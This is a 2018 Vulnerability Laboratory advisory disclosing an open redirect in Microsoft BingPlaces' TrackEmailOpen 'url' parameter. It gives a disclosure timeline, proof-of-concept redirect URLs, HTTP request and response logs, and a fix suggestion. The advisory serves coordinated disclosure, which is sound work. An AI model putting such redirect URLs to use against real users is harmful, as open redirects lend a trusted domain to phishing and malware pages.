Document Title: =============== Microsoft BingPlaces - TrackEmailOpen (url) Open Redirect Date: ===== 2018-11-19 References: =========== https://www.vulnerability-lab.com/get_content.php?id=2167 MSRC ID: CRM:0461060024 Acknowledgements: https://technet.microsoft.com/en-us/security/cc308589 Vulnerability Magazine: https://www.vulnerability-db.com/?q=articles/2018/11/16/microsoft-bingplaces-business-url-redirect-vulnerability VL-ID: ===== 2167 Common Vulnerability Scoring System: ==================================== 3.1 Vulnerability Class: ==================== Redirect or Open Redirect Introduction: ============= Bing Places for Business is a bing portal that enables local business owners add a listing for their business on bing. (Copy of the Homepage: https://www.bingplaces.com/ ) Abstract: ========= The vulnerability laboratory core research team discovered a open redirect web vulnerability in the official Microsoft BingPlaces online service web-application. Report-Timeline: ================ 2018-08-01: Researcher Notification & Coordination (Security Researcher) 2018-08-02: Vendor Notification (MSRC - Security Department) 2018-08-27: Vendor Response/Feedback (MSRC - Security Department) 2018-11-11: Vendor Fix/Patch (Microsoft Service Developer Team) 2018-11-12: Security Acknowledgements (MSRC - Security Department) 2018-11-19: Public Disclosure (Vulnerability Laboratory) Status: ======== Published Affected Products: ================== Microsoft Corporation Product: BingPlaces Business - Bing (Web-Application) v2018 Q4 Exploitation-Technique: ======================= Remote Severity: ========= Medium Details: ======== An open redirect web vulnerability has been discovered in the official Microsoft BingPlaces Business online service web-application. The issue allows remote attackers to redirect client-side requests to external malformed contents or malicious sources like webpages. The open redirect security vulnerability is located in the `url` parameter of the `TrackEmailOpen` function in the `StatsTracker` module. Remote attackers are able to redirect client-side GET method requests because of a non restricted url parameter. The attack vector of the vulnerability is non-persistent and the request method to execute is GET. The vulnerability is a classic open redirect web vulnerability. Successful exploitation of the open redirect web vulnerability results in external redirects to malicious sources like phishing pages, spoofed url web contents or external malware pages. Request Method(s): [+] GET Vulnerable Module(s): [+] StatsTracker Vulnerable Function(s): [+] TrackEmailOpen Vulnerable Parameter(s): [+] url Proof of Concept: ================= The open redirect web vulnerability can be exploited by remote attackers without privileged application user account and with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Example https://www.bingplaces.com/StatsTracker/TrackEmailOpen?&url=[External Redirect] PoC: Exploitation https://www.bingplaces.com/StatsTracker/TrackEmailOpen?&url=https%3A%2F%2Fwww.vulnerability-lab.com%2F https://www.bingplaces.com/StatsTracker/TrackEmailOpen?&url=https%3A%2F%2Fwww.vulnerability-lab.com%2Ftest.js --- PoC Sesson Logs (GET) --- https://www.bingplaces.com/StatsTracker/TrackEmailOpen?&url=https%3A%2F%2Fwww.vulnerability-lab.com%2F Host: www.bingplaces.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate, br Cookie: ASP.NET_SessionId=sulxsx3e2sznpufzpogp4ywp; BingPlacesCulture=en-US DNT: 1 Connection: keep-alive Upgrade-Insecure-Requests: 1 - GET: HTTP/1.1 200 OK Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Location: https://www.vulnerability-lab.com/ Server: Microsoft-IIS/8.5 X-AspNetMvc-Version: 5.2 X-AspNet-Version: 4.0.30319 X-Content-Type-Options: nosniff X-Powered-By: ASP.NET Date: Thu, 16 Aug 2018 07:42:17 GMT Content-Length: 151 https://www.vulnerability-lab.com/ Host: www.vulnerability-lab.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate, br Cookie: PHPSESSID=kdsucolj3rarbg4qmois3tmr07 Connection: keep-alive Upgrade-Insecure-Requests: 1 - GET: HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin Date: Thu, 16 Aug 2018 07:42:16 GMT Content-Length: 96002 Reference(s): https://www.bingplaces.com/ https://www.bingplaces.com/StatsTracker/ https://www.bingplaces.com/StatsTracker/TrackEmailOpen Solution: ========= The open redirect vulnerability can be patched by a restriction to the url parameter requested contents in the TrackEmailOpen module. Restrict the requests to local or whitelisted contents to deny external redirects. Risk: ===== The security risk of the open redirect vulnerability in the bingplaces online service web-application is estimated as medium. Credits: ======== Benjamin K.M. [research@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™